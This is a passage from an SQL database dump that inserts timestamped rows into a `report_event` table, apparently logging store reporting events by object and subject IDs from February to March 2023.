(3922, '2023-02-11 19:28:36', 1, 2063, 0, 1, 1),
(3923, '2023-02-12 01:01:27', 1, 2064, 0, 1, 1),
(3924, '2023-02-12 04:58:50', 1, 2064, 0, 1, 1),
(3925, '2023-02-12 04:58:56', 1, 2063, 0, 1, 1),
(3926, '2023-02-12 04:59:01', 1, 2062, 0, 1, 1),
(3927, '2023-02-12 04:59:05', 1, 2061, 0, 1, 1),
(3928, '2023-02-12 04:59:10', 1, 2060, 0, 1, 1),
(3929, '2023-02-12 04:59:14', 1, 2059, 0, 1, 1),
(3930, '2023-02-12 04:59:19', 1, 2058, 0, 1, 1),
(3931, '2023-02-12 04:59:24', 1, 2055, 0, 1, 1),
(3932, '2023-02-12 04:59:29', 1, 2054, 0, 1, 1),
(3933, '2023-02-12 05:04:58', 1, 2053, 0, 1, 1),
(3934, '2023-02-12 11:59:06', 1, 2064, 0, 1, 1),
(3935, '2023-02-12 17:24:39', 1, 2059, 0, 1, 1),
(3936, '2023-02-12 21:48:21', 1, 2060, 0, 1, 1),
(3937, '2023-02-13 16:07:38', 1, 2064, 0, 1, 1),
(3938, '2023-02-14 05:50:02', 1, 2059, 0, 1, 1),
(3939, '2023-02-14 11:48:34', 1, 2055, 0, 1, 1),
(3940, '2023-02-14 20:55:50', 1, 2063, 0, 1, 1),
(3941, '2023-02-15 01:15:18', 1, 2064, 0, 1, 1),
(3942, '2023-02-15 05:25:18', 1, 2054, 0, 1, 1),
(3943, '2023-02-15 11:20:22', 1, 2064, 0, 1, 1),
(3944, '2023-02-15 11:20:29', 1, 2064, 0, 1, 1),
(3945, '2023-02-15 15:28:26', 1, 2064, 0, 1, 1),
(3946, '2023-02-15 17:20:13', 1, 2053, 0, 1, 1),
(3947, '2023-02-16 01:45:17', 1, 2054, 0, 1, 1),
(3948, '2023-02-16 02:23:11', 1, 2060, 0, 1, 1),
(3949, '2023-02-16 03:01:40', 1, 2061, 0, 1, 1),
(3950, '2023-02-16 03:53:50', 1, 2059, 0, 1, 1),
(3951, '2023-02-16 04:33:38', 1, 2064, 0, 1, 1),
(3952, '2023-02-16 05:10:16', 1, 2062, 0, 1, 1),
(3953, '2023-02-16 06:03:57', 1, 2055, 0, 1, 1),
(3954, '2023-02-16 06:47:20', 1, 2063, 0, 1, 1),
(3955, '2023-02-16 06:59:58', 1, 2058, 0, 1, 1),
(3956, '2023-02-16 15:38:07', 1, 2062, 0, 1, 1),
(3957, '2023-02-16 15:38:58', 1, 2062, 0, 1, 1),
(3958, '2023-02-16 17:48:11', 1, 2053, 0, 1, 1),
(3959, '2023-02-16 17:48:19', 1, 2054, 0, 1, 1),
(3960, '2023-02-16 17:48:27', 1, 2055, 0, 1, 1),
(3961, '2023-02-16 17:48:55', 1, 2064, 0, 1, 1),
(3962, '2023-02-16 17:49:10', 1, 2063, 0, 1, 1),
(3963, '2023-02-16 17:49:18', 1, 2062, 0, 1, 1),
(3964, '2023-02-16 17:49:26', 1, 2060, 0, 1, 1),
(3965, '2023-02-16 17:49:33', 1, 2059, 0, 1, 1),
(3966, '2023-02-16 17:49:39', 1, 2061, 0, 1, 1),
(3967, '2023-02-16 17:49:46', 1, 2058, 0, 1, 1),
(3968, '2023-02-17 04:53:28', 1, 2058, 0, 1, 1),
(3969, '2023-02-17 04:53:33', 1, 2058, 0, 1, 1),
(3970, '2023-02-17 13:04:21', 1, 2063, 0, 1, 1),
(3971, '2023-02-17 13:04:22', 1, 2058, 0, 1, 1),
(3972, '2023-02-18 01:41:59', 1, 2063, 0, 1, 1),
(3973, '2023-02-18 01:54:46', 1, 2060, 0, 1, 1),
(3974, '2023-02-18 04:07:10', 1, 2055, 0, 1, 1),
(3975, '2023-02-18 18:04:16', 1, 2061, 0, 1, 1),
(3976, '2023-02-18 21:42:41', 1, 2060, 0, 1, 1),
(3977, '2023-02-18 22:43:53', 1, 2061, 0, 1, 1),
(3978, '2023-02-18 22:44:01', 1, 2061, 0, 1, 1),
(3979, '2023-02-19 00:11:39', 1, 2059, 0, 1, 1),
(3980, '2023-02-19 03:03:21', 1, 2064, 0, 1, 1),
(3981, '2023-02-19 05:11:04', 1, 2064, 0, 1, 1),
(3982, '2023-02-19 05:43:13', 1, 2054, 0, 1, 1),
(3983, '2023-02-19 05:43:19', 1, 2060, 0, 1, 1),
(3984, '2023-02-19 05:43:22', 1, 2061, 0, 1, 1),
(3985, '2023-02-19 05:43:25', 1, 2059, 0, 1, 1),
(3986, '2023-02-19 05:43:34', 1, 2064, 0, 1, 1),
(3987, '2023-02-19 05:44:08', 1, 2062, 0, 1, 1),
(3988, '2023-02-19 05:44:57', 1, 2055, 0, 1, 1),
(3989, '2023-02-19 05:45:38', 1, 2063, 0, 1, 1),
(3990, '2023-02-19 05:45:47', 1, 2058, 0, 1, 1),
(3991, '2023-02-19 15:20:02', 1, 2064, 0, 1, 1),
(3992, '2023-02-19 20:16:36', 1, 2063, 0, 1, 1),
(3993, '2023-02-19 23:25:11', 1, 2060, 0, 1, 1),
(3994, '2023-02-20 01:25:14', 1, 2059, 0, 1, 1),
(3995, '2023-02-20 03:00:32', 1, 2062, 0, 1, 1),
(3996, '2023-02-20 06:16:18', 1, 2055, 0, 1, 1),
(3997, '2023-02-20 21:56:22', 1, 2058, 0, 1, 1),
(3998, '2023-02-21 03:09:30', 1, 2055, 0, 1, 1),
(3999, '2023-02-21 11:59:47', 1, 2059, 0, 1, 1),
(4000, '2023-02-21 16:15:20', 1, 2064, 0, 1, 1),
(4001, '2023-02-21 22:55:51', 1, 2063, 0, 1, 1),
(4002, '2023-02-22 08:51:31', 1, 2061, 0, 1, 1),
(4003, '2023-02-22 08:52:13', 1, 2061, 0, 1, 1),
(4004, '2023-02-22 16:19:58', 1, 2055, 0, 1, 1),
(4005, '2023-02-22 16:20:00', 1, 2054, 0, 1, 1),
(4006, '2023-02-22 16:20:01', 1, 2058, 0, 1, 1),
(4007, '2023-02-22 16:20:02', 1, 2060, 0, 1, 1),
(4008, '2023-02-22 16:20:03', 1, 2061, 0, 1, 1),
(4009, '2023-02-22 16:20:04', 1, 2062, 0, 1, 1),
(4010, '2023-02-22 16:20:06', 1, 2064, 0, 1, 1),
(4011, '2023-02-22 16:20:07', 1, 2063, 0, 1, 1),
(4012, '2023-02-22 16:20:10', 1, 2059, 0, 1, 1),
(4013, '2023-02-22 16:20:14', 1, 2053, 0, 1, 1),
(4014, '2023-02-22 16:20:16', 1, 2055, 0, 1, 1),
(4015, '2023-02-22 16:20:18', 1, 2054, 0, 1, 1),
(4016, '2023-02-23 03:58:26', 1, 2064, 0, 1, 1),
(4017, '2023-02-23 05:28:24', 1, 2064, 0, 1, 1),
(4018, '2023-02-23 07:47:17', 1, 2059, 0, 1, 1),
(4019, '2023-02-23 10:59:26', 1, 2062, 0, 1, 1),
(4020, '2023-02-23 11:37:15', 1, 2054, 0, 1, 1),
(4021, '2023-02-23 14:37:54', 1, 2062, 0, 1, 1),
(4022, '2023-02-24 00:22:37', 1, 2063, 0, 1, 1),
(4023, '2023-02-24 05:21:45', 1, 2059, 0, 1, 1),
(4024, '2023-02-24 08:34:39', 1, 2064, 0, 1, 1),
(4025, '2023-02-24 08:34:45', 1, 2063, 0, 1, 1),
(4026, '2023-02-24 08:35:54', 1, 2060, 0, 1, 1),
(4027, '2023-02-24 08:36:10', 1, 2059, 0, 1, 1),
(4028, '2023-02-24 08:36:12', 1, 2058, 0, 1, 1),
(4029, '2023-02-24 08:37:01', 1, 2054, 0, 1, 1),
(4030, '2023-02-24 08:45:58', 1, 2053, 0, 1, 1),
(4031, '2023-02-24 09:52:35', 1, 2058, 0, 1, 1),
(4032, '2023-02-24 11:11:34', 1, 2063, 0, 1, 1),
(4033, '2023-02-24 12:49:32', 1, 2064, 0, 1, 1),
(4034, '2023-02-24 12:56:09', 1, 2064, 0, 1, 1),
(4035, '2023-02-24 16:45:05', 1, 2059, 0, 1, 1),
(4036, '2023-02-24 23:23:22', 1, 2059, 0, 1, 1),
(4037, '2023-02-25 08:17:27', 1, 2062, 0, 1, 1),
(4038, '2023-02-25 17:22:08', 1, 2061, 0, 1, 1),
(4039, '2023-02-25 17:22:17', 1, 2061, 0, 1, 1),
(4040, '2023-02-26 04:09:10', 1, 2060, 0, 1, 1),
(4041, '2023-02-26 04:10:32', 1, 2060, 0, 1, 1),
(4042, '2023-02-26 15:56:23', 1, 2064, 0, 1, 1),
(4043, '2023-02-26 17:26:48', 1, 2054, 0, 1, 1),
(4044, '2023-02-27 02:59:38', 1, 2055, 0, 1, 1),
(4045, '2023-02-27 05:39:17', 1, 2064, 0, 1, 1),
(4046, '2023-02-27 05:48:53', 1, 2064, 733, 1, 1),
(4047, '2023-02-27 08:28:23', 1, 2064, 0, 1, 1),
(4048, '2023-02-27 09:32:17', 1, 2063, 0, 1, 1),
(4049, '2023-02-27 15:31:54', 1, 2060, 0, 1, 1),
(4050, '2023-02-27 16:01:50', 1, 2060, 0, 1, 1),
(4051, '2023-02-27 16:14:35', 1, 2063, 0, 1, 1),
(4052, '2023-02-27 16:47:10', 1, 2058, 0, 1, 1),
(4053, '2023-02-27 17:22:59', 1, 2060, 0, 1, 1),
(4054, '2023-02-27 17:34:53', 1, 2063, 0, 1, 1),
(4055, '2023-02-27 18:05:54', 1, 2058, 0, 1, 1),
(4056, '2023-02-27 19:44:21', 1, 2060, 0, 1, 1),
(4057, '2023-02-27 19:56:16', 1, 2063, 0, 1, 1),
(4058, '2023-02-27 20:27:08', 1, 2058, 0, 1, 1),
(4059, '2023-02-27 21:25:07', 1, 2055, 0, 1, 1),
(4060, '2023-02-27 23:01:15', 1, 2061, 0, 1, 1),
(4061, '2023-02-27 23:55:41', 1, 2062, 0, 1, 1),
(4062, '2023-02-28 01:21:14', 1, 2064, 0, 1, 1),
(4063, '2023-02-28 01:21:19', 1, 2064, 0, 1, 1),
(4064, '2023-02-28 01:21:23', 1, 2064, 0, 1, 1),
(4065, '2023-02-28 01:21:27', 1, 2063, 0, 1, 1),
(4066, '2023-02-28 01:21:31', 1, 2062, 0, 1, 1),
(4067, '2023-02-28 01:21:34', 1, 2061, 0, 1, 1),
(4068, '2023-02-28 01:21:38', 1, 2060, 0, 1, 1),
(4069, '2023-02-28 01:21:41', 1, 2059, 0, 1, 1),
(4070, '2023-02-28 01:21:46', 1, 2058, 0, 1, 1),
(4071, '2023-02-28 01:21:49', 1, 2055, 0, 1, 1),
(4072, '2023-02-28 01:21:52', 1, 2054, 0, 1, 1),
(4073, '2023-02-28 01:37:19', 1, 2060, 0, 1, 1),
(4074, '2023-02-28 01:49:41', 1, 2063, 0, 1, 1),
(4075, '2023-02-28 02:22:29', 1, 2058, 0, 1, 1),
(4076, '2023-02-28 03:16:41', 1, 2061, 0, 1, 1),
(4077, '2023-02-28 03:21:37', 1, 2055, 0, 1, 1),
(4078, '2023-02-28 04:55:45', 1, 2064, 0, 1, 1),
(4079, '2023-02-28 05:02:27', 1, 2061, 0, 1, 1),
(4080, '2023-02-28 05:56:51', 1, 2062, 0, 1, 1),
(4081, '2023-02-28 08:26:44', 1, 2060, 0, 1, 1),
(4082, '2023-02-28 08:39:34', 1, 2063, 0, 1, 1),
(4083, '2023-02-28 09:42:03', 1, 2060, 0, 1, 1),
(4084, '2023-02-28 09:54:46', 1, 2063, 0, 1, 1),
(4085, '2023-02-28 10:27:27', 1, 2058, 0, 1, 1),
(4086, '2023-02-28 11:27:57', 1, 2055, 0, 1, 1),
(4087, '2023-02-28 11:33:12', 1, 2059, 0, 1, 1),
(4088, '2023-02-28 13:08:35', 1, 2061, 0, 1, 1),
(4089, '2023-02-28 13:50:35', 1, 2054, 0, 1, 1),
(4090, '2023-02-28 14:04:12', 1, 2062, 0, 1, 1),
(4091, '2023-02-28 16:03:28', 1, 2054, 0, 1, 1),
(4092, '2023-02-28 16:31:01', 1, 2059, 0, 1, 1),
(4093, '2023-02-28 16:52:13', 1, 2064, 0, 1, 1),
(4094, '2023-02-28 23:15:51', 1, 2059, 0, 1, 1),
(4095, '2023-03-01 00:02:50', 1, 2064, 0, 1, 1),
(4096, '2023-03-01 01:48:49', 1, 2060, 0, 1, 1),
(4097, '2023-03-01 02:01:15', 1, 2063, 0, 1, 1),
(4098, '2023-03-01 02:34:28', 1, 2058, 0, 1, 1),
(4099, '2023-03-01 03:33:26', 1, 2055, 0, 1, 1),
(4100, '2023-03-01 05:15:08', 1, 2061, 0, 1, 1),
(4101, '2023-03-01 05:27:15', 1, 2064, 0, 1, 1),
(4102, '2023-03-01 06:09:22', 1, 2062, 0, 1, 1),
(4103, '2023-03-01 07:47:18', 1, 2054, 0, 1, 1),
(4104, '2023-03-01 08:06:00', 1, 2054, 0, 1, 1),
(4105, '2023-03-01 08:12:25', 1, 2053, 0, 1, 1),
(4106, '2023-03-01 08:33:04', 1, 2059, 0, 1, 1),
(4107, '2023-03-01 08:54:09', 1, 2064, 0, 1, 1),
(4108, '2023-03-01 09:16:28', 1, 2062, 0, 1, 1),
(4109, '2023-03-01 12:19:45', 1, 2054, 0, 1, 1),
(4110, '2023-03-01 12:20:02', 1, 2055, 0, 1, 1),
(4111, '2023-03-01 12:21:05', 1, 2064, 0, 1, 1),
(4112, '2023-03-01 12:21:21', 1, 2063, 0, 1, 1),
(4113, '2023-03-01 12:21:38', 1, 2062, 0, 1, 1),
(4114, '2023-03-01 12:21:54', 1, 2060, 0, 1, 1),
(4115, '2023-03-01 12:22:11', 1, 2059, 0, 1, 1),
(4116, '2023-03-01 12:22:28', 1, 2061, 0, 1, 1),
(4117, '2023-03-01 12:22:44', 1, 2058, 0, 1, 1),
(4118, '2023-03-01 17:50:25', 1, 2060, 0, 1, 1),
(4119, '2023-03-01 18:02:27', 1, 2063, 0, 1, 1),
(4120, '2023-03-01 18:14:20', 1, 2059, 0, 1, 1),
(4121, '2023-03-01 18:32:18', 1, 2058, 0, 1, 1),
(4122, '2023-03-01 19:34:03', 1, 2055, 0, 1, 1),
(4123, '2023-03-01 20:31:06', 1, 2060, 0, 1, 1),
(4124, '2023-03-01 20:42:44', 1, 2063, 0, 1, 1),
(4125, '2023-03-01 21:12:01', 1, 2058, 0, 1, 1),
(4126, '2023-03-01 21:28:25', 1, 2053, 0, 1, 1),
(4127, '2023-03-01 22:06:31', 1, 2055, 0, 1, 1),
(4128, '2023-03-01 23:03:04', 1, 2060, 0, 1, 1),
(4129, '2023-03-01 23:15:20', 1, 2063, 0, 1, 1),
(4130, '2023-03-01 23:45:36', 1, 2058, 0, 1, 1),
(4131, '2023-03-02 00:41:46', 1, 2055, 0, 1, 1),
(4132, '2023-03-02 01:19:47', 1, 2063, 0, 1, 1),
(4133, '2023-03-02 02:21:12', 1, 2061, 0, 1, 1),
(4134, '2023-03-02 03:16:50', 1, 2062, 0, 1, 1),
(4135, '2023-03-02 05:26:44', 1, 2054, 0, 1, 1),
(4136, '2023-03-02 05:56:12', 1, 2059, 0, 1, 1),
(4137, '2023-03-02 06:19:32', 1, 2064, 0, 1, 1),
(4138, '2023-03-02 08:21:47', 1, 2054, 0, 1, 1),
(4139, '2023-03-02 08:24:02', 1, 2055, 0, 1, 1),
(4140, '2023-03-02 08:25:51', 1, 2058, 0, 1, 1),
(4141, '2023-03-02 08:26:35', 1, 2061, 0, 1, 1),
(4142, '2023-03-02 08:27:41', 1, 2060, 0, 1, 1),
(4143, '2023-03-02 08:28:13', 1, 2059, 0, 1, 1),
(4144, '2023-03-02 08:29:01', 1, 2063, 0, 1, 1),
(4145, '2023-03-02 08:30:19', 1, 2062, 0, 1, 1),
(4146, '2023-03-02 08:30:33', 1, 2064, 0, 1, 1),
(4147, '2023-03-02 08:40:50', 1, 2053, 0, 1, 1),
(4148, '2023-03-02 15:01:18', 1, 2064, 0, 1, 1),
(4149, '2023-03-03 02:07:57', 1, 2064, 0, 1, 1),
(4150, '2023-03-03 02:20:09', 1, 2053, 0, 1, 1),
(4151, '2023-03-03 05:05:07', 1, 2063, 0, 1, 1),
(4152, '2023-03-03 05:05:10', 1, 2062, 0, 1, 1),
(4153, '2023-03-03 05:05:13', 1, 2060, 0, 1, 1),
(4154, '2023-03-03 05:05:15', 1, 2059, 0, 1, 1),
(4155, '2023-03-03 11:52:48', 1, 2063, 0, 1, 1),
(4156, '2023-03-04 21:17:57', 1, 2058, 0, 1, 1),
(4157, '2023-03-05 08:26:28', 1, 2064, 0, 1, 1),
(4158, '2023-03-05 11:05:38', 1, 2062, 0, 1, 1),
(4159, '2023-03-05 11:05:40', 1, 2062, 0, 1, 1),
(4160, '2023-03-05 11:05:46', 1, 2062, 0, 1, 1),
(4161, '2023-03-05 17:54:15', 1, 2061, 0, 1, 1),
(4162, '2023-03-05 17:54:20', 4, 2061, 746, 1, 1),
(4163, '2023-03-05 21:10:16', 1, 2062, 0, 1, 1),
(4164, '2023-03-06 11:46:24', 1, 2064, 0, 1, 1),
(4165, '2023-03-06 14:46:07', 1, 2064, 0, 1, 1),
(4166, '2023-03-07 03:16:31', 1, 2060, 0, 1, 1),
(4167, '2023-03-07 03:16:31', 1, 2054, 0, 1, 1),
(4168, '2023-03-07 03:16:32', 1, 2055, 0, 1, 1),
(4169, '2023-03-07 03:16:34', 1, 2063, 0, 1, 1),
(4170, '2023-03-07 03:16:36', 1, 2059, 0, 1, 1),
(4171, '2023-03-07 03:16:37', 1, 2062, 0, 1, 1),
(4172, '2023-03-07 03:16:38', 1, 2064, 0, 1, 1),
(4173, '2023-03-07 07:13:17', 1, 2054, 0, 1, 1),
(4174, '2023-03-07 12:47:04', 1, 2059, 0, 1, 1),
(4175, '2023-03-07 14:43:51', 1, 2064, 0, 1, 1),
(4176, '2023-03-07 17:46:51', 1, 2060, 0, 1, 1),
(4177, '2023-03-07 21:31:39', 1, 2061, 0, 1, 1),
(4178, '2023-03-08 01:04:40', 1, 2063, 0, 1, 1),
(4179, '2023-03-08 07:47:23', 1, 2059, 0, 1, 1),
(4180, '2023-03-08 10:11:00', 1, 2062, 0, 1, 1),
(4181, '2023-03-08 11:30:34', 1, 2060, 0, 1, 1),
(4182, '2023-03-08 15:31:58', 1, 2062, 0, 1, 1),
(4183, '2023-03-08 15:32:28', 1, 2062, 0, 1, 1),
(4184, '2023-03-08 15:36:50', 1, 2054, 0, 1, 1),
(4185, '2023-03-09 15:21:10', 1, 2055, 0, 1, 1),
(4186, '2023-03-09 15:21:17', 1, 2055, 753, 1, 1),
(4187, '2023-03-09 15:22:13', 1, 2055, 0, 1, 1),
(4188, '2023-03-09 19:14:21', 1, 2064, 0, 1, 1),
(4189, '2023-03-10 02:33:39', 1, 2063, 0, 1, 1),
(4190, '2023-03-10 02:51:19', 1, 2063, 0, 1, 1),
(4191, '2023-03-10 12:29:38', 1, 2064, 0, 1, 1),
(4192, '2023-03-10 17:07:14', 1, 2055, 0, 1, 1),
(4193, '2023-03-10 17:07:15', 1, 2054, 0, 1, 1),
(4194, '2023-03-10 17:07:16', 1, 2060, 0, 1, 1),
(4195, '2023-03-10 17:07:17', 1, 2063, 0, 1, 1),
(4196, '2023-03-10 17:07:19', 1, 2059, 0, 1, 1),
(4197, '2023-03-10 17:07:20', 1, 2064, 0, 1, 1),
(4198, '2023-03-10 17:07:21', 1, 2058, 0, 1, 1),
(4199, '2023-03-10 17:07:22', 1, 2061, 0, 1, 1),
(4200, '2023-03-10 18:06:57', 1, 2061, 0, 1, 1),
(4201, '2023-03-10 18:07:22', 1, 2061, 0, 1, 1),
(4202, '2023-03-11 02:57:33', 1, 2060, 0, 1, 1),
(4203, '2023-03-11 03:43:19', 1, 2062, 0, 1, 1),
(4204, '2023-03-11 03:43:23', 1, 2062, 755, 1, 1),
(4205, '2023-03-11 03:43:53', 1, 2062, 0, 1, 1),
(4206, '2023-03-11 15:23:17', 1, 2061, 0, 1, 1),
(4207, '2023-03-11 15:23:21', 1, 2059, 0, 1, 1),
(4208, '2023-03-11 16:59:45', 1, 2064, 0, 1, 1),
(4209, '2023-03-11 17:03:46', 1, 2060, 0, 1, 1),
(4210, '2023-03-11 17:21:21', 1, 2060, 0, 1, 1),
(4211, '2023-03-12 06:42:26', 1, 2061, 0, 1, 1),
(4212, '2023-03-12 06:42:32', 1, 2061, 756, 1, 1),
(4213, '2023-03-12 06:43:00', 1, 2061, 0, 1, 1),
(4214, '2023-03-12 10:24:07', 1, 2064, 0, 1, 1),
(4215, '2023-03-12 12:42:38', 1, 2062, 0, 1, 1),
(4216, '2023-03-12 12:46:31', 1, 2059, 0, 1, 1),
(4217, '2023-03-12 12:46:34', 1, 2059, 757, 1, 1),
(4218, '2023-03-12 12:46:49', 1, 2059, 0, 1, 1),
(4219, '2023-03-12 14:11:43', 1, 2062, 0, 1, 1),
(4220, '2023-03-12 14:12:02', 1, 2062, 0, 1, 1),
(4221, '2023-03-12 15:37:11', 1, 2063, 0, 1, 1),
(4222, '2023-03-12 18:24:40', 1, 2063, 0, 1, 1),
(4223, '2023-03-13 07:51:10', 1, 2054, 0, 1, 1),
(4224, '2023-03-13 08:03:14', 1, 2055, 0, 1, 1),
(4225, '2023-03-13 08:28:20', 1, 2054, 0, 1, 1),
(4226, '2023-03-13 09:10:56', 1, 2060, 0, 1, 1),
(4227, '2023-03-13 09:54:47', 1, 2061, 0, 1, 1),
(4228, '2023-03-13 10:55:17', 1, 2063, 0, 1, 1),
(4229, '2023-03-13 10:55:17', 1, 2062, 0, 1, 1),
(4230, '2023-03-13 10:55:17', 1, 2061, 0, 1, 1),
(4231, '2023-03-13 10:55:18', 1, 2054, 0, 1, 1),
(4232, '2023-03-13 10:55:18', 1, 2058, 0, 1, 1),
(4233, '2023-03-13 10:55:19', 1, 2055, 0, 1, 1),
(4234, '2023-03-13 10:55:19', 1, 2060, 0, 1, 1),
(4235, '2023-03-13 10:55:19', 1, 2064, 0, 1, 1),
(4236, '2023-03-13 10:55:20', 1, 2059, 0, 1, 1),
(4237, '2023-03-13 11:13:35', 1, 2059, 0, 1, 1),
(4238, '2023-03-13 12:29:23', 1, 2064, 0, 1, 1),
(4239, '2023-03-13 13:38:40', 1, 2062, 0, 1, 1),
(4240, '2023-03-13 15:10:53', 1, 2055, 0, 1, 1),
(4241, '2023-03-13 16:20:31', 1, 2063, 0, 1, 1),
(4242, '2023-03-13 16:39:26', 1, 2058, 0, 1, 1),
(4243, '2023-03-13 17:23:51', 1, 2054, 0, 1, 1),
(4244, '2023-03-13 17:23:54', 1, 2054, 760, 1, 1),
(4245, '2023-03-13 17:24:36', 1, 2054, 0, 1, 1),
(4246, '2023-03-13 17:53:29', 1, 2054, 0, 1, 1),
(4247, '2023-03-13 18:45:00', 1, 2054, 0, 1, 1),
(4248, '2023-03-13 19:26:48', 1, 2060, 0, 1, 1),
(4249, '2023-03-13 20:10:58', 1, 2061, 0, 1, 1),
(4250, '2023-03-13 20:44:20', 1, 2059, 0, 1, 1),
(4251, '2023-03-13 21:29:02', 1, 2059, 0, 1, 1),
(4252, '2023-03-13 22:43:35', 1, 2064, 0, 1, 1),
(4253, '2023-03-13 22:59:27', 1, 2054, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(4254, '2023-03-13 22:59:47', 1, 2054, 0, 1, 1),
(4255, '2023-03-13 23:41:37', 1, 2054, 0, 1, 1),
(4256, '2023-03-14 00:20:29', 1, 2060, 0, 1, 1),
(4257, '2023-03-14 01:01:36', 1, 2061, 0, 1, 1),
(4258, '2023-03-14 02:15:14', 1, 2059, 0, 1, 1),
(4259, '2023-03-14 03:27:22', 1, 2064, 0, 1, 1),
(4260, '2023-03-14 04:34:17', 1, 2062, 0, 1, 1),
(4261, '2023-03-14 06:00:37', 1, 2055, 0, 1, 1),
(4262, '2023-03-14 06:14:25', 1, 2060, 0, 1, 1),
(4263, '2023-03-14 07:07:08', 1, 2063, 0, 1, 1),
(4264, '2023-03-14 07:25:19', 1, 2058, 0, 1, 1),
(4265, '2023-03-14 09:36:04', 1, 2059, 0, 1, 1),
(4266, '2023-03-14 23:54:51', 1, 2060, 0, 1, 1),
(4267, '2023-03-14 23:55:00', 1, 2060, 763, 1, 1),
(4268, '2023-03-14 23:55:38', 1, 2060, 0, 1, 1),
(4269, '2023-03-15 00:44:21', 1, 2059, 0, 1, 1),
(4270, '2023-03-15 03:58:36', 1, 2060, 0, 1, 1),
(4271, '2023-03-15 11:03:01', 1, 2064, 0, 1, 1),
(4272, '2023-03-15 11:39:10', 1, 2061, 0, 1, 1),
(4273, '2023-03-15 12:51:04', 1, 2064, 0, 1, 1),
(4274, '2023-03-15 20:44:05', 1, 2064, 0, 1, 1),
(4275, '2023-03-16 02:47:21', 1, 2064, 0, 1, 1),
(4276, '2023-03-16 03:18:51', 1, 2054, 0, 1, 1),
(4277, '2023-03-16 03:19:15', 1, 2055, 0, 1, 1),
(4278, '2023-03-16 03:20:51', 1, 2064, 0, 1, 1),
(4279, '2023-03-16 03:21:15', 1, 2063, 0, 1, 1),
(4280, '2023-03-16 03:21:40', 1, 2062, 0, 1, 1),
(4281, '2023-03-16 03:22:04', 1, 2060, 0, 1, 1),
(4282, '2023-03-16 03:22:28', 1, 2059, 0, 1, 1),
(4283, '2023-03-16 03:22:53', 1, 2061, 0, 1, 1),
(4284, '2023-03-16 03:23:18', 1, 2058, 0, 1, 1),
(4285, '2023-03-16 04:59:23', 1, 2059, 0, 1, 1),
(4286, '2023-03-16 06:14:02', 1, 2061, 0, 1, 1),
(4287, '2023-03-16 12:54:07', 1, 2059, 0, 1, 1),
(4288, '2023-03-16 16:46:48', 1, 2064, 0, 1, 1),
(4289, '2023-03-16 17:38:42', 1, 2062, 0, 1, 1),
(4290, '2023-03-16 17:44:29', 1, 2062, 0, 1, 1),
(4291, '2023-03-17 01:18:45', 1, 2060, 0, 1, 1),
(4292, '2023-03-17 02:39:21', 1, 2058, 0, 1, 1),
(4293, '2023-03-17 02:39:25', 1, 2058, 768, 1, 1),
(4294, '2023-03-17 02:40:41', 1, 2058, 0, 1, 1),
(4295, '2023-03-17 08:28:21', 1, 2055, 0, 1, 1),
(4296, '2023-03-17 08:28:22', 1, 2054, 0, 1, 1),
(4297, '2023-03-17 08:28:23', 1, 2059, 0, 1, 1),
(4298, '2023-03-17 08:28:24', 1, 2058, 0, 1, 1),
(4299, '2023-03-17 08:28:25', 1, 2060, 0, 1, 1),
(4300, '2023-03-17 08:28:26', 1, 2061, 0, 1, 1),
(4301, '2023-03-17 08:28:29', 1, 2064, 0, 1, 1),
(4302, '2023-03-17 08:28:30', 1, 2062, 0, 1, 1),
(4303, '2023-03-17 08:28:32', 1, 2063, 0, 1, 1),
(4304, '2023-03-17 08:28:48', 1, 2053, 0, 1, 1),
(4305, '2023-03-17 15:02:41', 1, 2058, 0, 1, 1),
(4306, '2023-03-17 15:02:43', 1, 2059, 0, 1, 1),
(4307, '2023-03-17 15:02:43', 1, 2055, 0, 1, 1),
(4308, '2023-03-17 15:02:46', 1, 2054, 0, 1, 1),
(4309, '2023-03-17 19:47:09', 1, 2058, 0, 1, 1),
(4310, '2023-03-17 23:16:39', 1, 2053, 0, 1, 1),
(4311, '2023-03-18 05:46:25', 1, 2061, 0, 1, 1),
(4312, '2023-03-18 06:15:08', 1, 2054, 0, 1, 1),
(4313, '2023-03-18 06:15:11', 1, 2059, 0, 1, 1),
(4314, '2023-03-18 06:15:14', 1, 2061, 0, 1, 1),
(4315, '2023-03-18 06:15:17', 1, 2058, 0, 1, 1),
(4316, '2023-03-18 09:23:44', 1, 2060, 0, 1, 1),
(4317, '2023-03-18 18:28:23', 1, 2054, 0, 1, 1),
(4318, '2023-03-18 20:07:30', 1, 2063, 0, 1, 1),
(4319, '2023-03-18 20:07:34', 1, 2063, 770, 1, 1),
(4320, '2023-03-18 20:08:08', 1, 2063, 0, 1, 1),
(4321, '2023-03-19 06:04:55', 1, 2058, 0, 1, 1),
(4322, '2023-03-19 08:40:14', 1, 2063, 0, 1, 1),
(4323, '2023-03-19 08:40:59', 1, 2059, 0, 1, 1),
(4324, '2023-03-19 09:32:40', 1, 2060, 0, 1, 1),
(4325, '2023-03-19 18:04:00', 1, 2061, 0, 1, 1),
(4326, '2023-03-19 18:04:14', 1, 2061, 0, 1, 1),
(4327, '2023-03-19 19:43:42', 1, 2064, 0, 1, 1),
(4328, '2023-03-19 23:35:25', 1, 2064, 0, 1, 1),
(4329, '2023-03-20 09:06:47', 1, 2064, 0, 1, 1),
(4330, '2023-03-20 10:41:30', 1, 2064, 0, 1, 1),
(4331, '2023-03-20 20:25:58', 1, 2054, 0, 1, 1),
(4332, '2023-03-20 20:27:58', 1, 2054, 0, 1, 1),
(4333, '2023-03-20 20:28:50', 1, 2055, 0, 1, 1),
(4334, '2023-03-20 20:29:55', 1, 2054, 0, 1, 1),
(4335, '2023-03-20 20:30:58', 1, 2055, 0, 1, 1),
(4336, '2023-03-20 20:35:54', 1, 2054, 0, 1, 1),
(4337, '2023-03-20 20:36:50', 1, 2055, 0, 1, 1),
(4338, '2023-03-20 20:41:55', 1, 2064, 0, 1, 1),
(4339, '2023-03-20 20:43:44', 1, 2064, 0, 1, 1),
(4340, '2023-03-21 02:10:07', 1, 2055, 0, 1, 1),
(4341, '2023-03-21 03:15:58', 1, 2064, 0, 1, 1),
(4342, '2023-03-21 05:41:18', 1, 2064, 0, 1, 1),
(4343, '2023-03-21 06:42:08', 1, 2055, 0, 1, 1),
(4344, '2023-03-21 12:30:09', 1, 2055, 0, 1, 1),
(4345, '2023-03-21 17:25:08', 1, 2064, 0, 1, 1),
(4346, '2023-03-21 17:25:09', 1, 2064, 0, 1, 1),
(4347, '2023-03-21 17:25:11', 1, 2064, 0, 1, 1),
